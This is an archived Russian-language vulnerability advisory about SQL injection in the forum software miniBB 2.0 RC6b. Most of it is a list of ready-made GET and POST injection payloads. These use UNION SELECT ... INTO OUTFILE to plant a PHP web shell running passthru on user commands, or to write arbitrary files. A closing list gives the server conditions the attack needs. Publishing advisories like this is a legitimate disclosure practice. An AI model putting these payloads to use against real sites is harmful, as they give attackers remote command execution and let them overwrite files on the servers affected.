Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12478
HistoryApr 30, 2006 - 12:00 a.m.

SQL Injection: miniBB 2.0 RC6b

2006-04-3000:00:00
vulners.com
54
  1. SQL Injection (GET)

Не фильтруется параметр confirmCode.

/index.php?action=confirmpasswd&confirmCode=f' union select '<?
passthru($_GET[cmd]) ?>' from mysql.user INTO OUTFILE
'/var/www/html/shell.php'/*

Не фильтруется параметр post.

/index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO
OUTFILE '/tmp/passwd'/*

/index.php?action=editmsg&post=1' union select 1,1 from mysql.user INTO
OUTFILE '/tmp/passwd'/*

  1. SQL Injection (POST)

Не фильтруется user_usr.

user_usr=f' union select '<? passthru($_GET[cmd]) ?>','123' from mysql.user
INTO OUTFILE '/var/www/html/shell.php'/*

/?action=sendpass

Не фильтруется email.

email=f' union select 0,0,'<? passthru($_GET[cmd]) ?>' from mysql.user INTO
OUTFILE '/var/www/html/shell.php'/*

/?action=registernew

Не фильтруется login и email.

login||email=1' union select 1 from mysql.user INTO OUTFILE '/tmp/passwd'/*

В случае, если:

        злоумышленник знает полный путь к каталогу, в котором размещен

контент;

        magic_quotes_gpc=off;

        пользователь, с чьими правами идет обращение к БД имеет права

File_priv;

        создание файла в пределах каталога web-сервера или за его

приделами разрешено пользователю от имени которого работает БД;

то, он может перезаписать произвольные файлы или создать web-shell.

Сайт производителя: http://www.minibb.net/